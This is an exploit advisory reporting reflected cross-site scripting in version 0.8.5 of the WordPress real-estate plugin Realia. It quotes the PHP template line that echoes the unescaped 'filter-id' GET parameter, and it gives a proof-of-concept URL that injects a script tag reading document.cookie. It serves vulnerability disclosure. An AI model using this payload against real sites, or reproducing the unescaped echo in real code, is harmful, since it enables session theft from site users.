Exploit Title : wordpress plugin 'Realia' (real estate solution) multiple XSS Vulnerability 
Author         : WICS
Date             : 03/06/2016
Software Link  : https://wordpress.org/plugins/realia/
Tested Version: 0.8.5
 
 
Overview:
Realia is wordpress plugin which provides functionality of real estate service like search and sale of property.
                 
this script is having property search form which is vulnerable to Cross Site Scripting attack
template codes inside directory realia\templates\widgets\filter-fields are to display search form on user end. 
scripts (inside directory realia\templates\widgets\filter-fields) are not encoding user supplied data in GET method variable before printing to search page and
causing XSS vulnerability.
for example in id.php, from line number 7 to 9, input text field code is given below
<input type="text" name="filter-id" class="form-control"
        <?php if ( 'placeholders' == $input_titles ) : ?>placeholder="<?php echo __( 'Property ID', 'realia' ); ?>"<?php endif; ?>
           value="<?php echo ! empty( $_GET['filter-id'] ) ? $_GET['filter-id'] : ''; ?>"
on line number 9, GET method variable filter-id value is getting pass directly and no XSS filter to clean the data which results in XSS
 
POC
http://127.0.0.1/wordpress/properties/?filter-contract=RENT&filter-id="><script>alert(document.cookie);</script>&filter-location=&filter-property-type=&filter-amenity=&filter-status=&filter-contract=&filter-material=&filter-price-from=1337'&filter-price-to=&filter-rooms=&filter-baths=&rent_filter-beds=&filter-year-built=&filter-home-area-from=&filter-home-area-to=&filter-lot-area-from=&filter-lot-area-to=&filter-garages=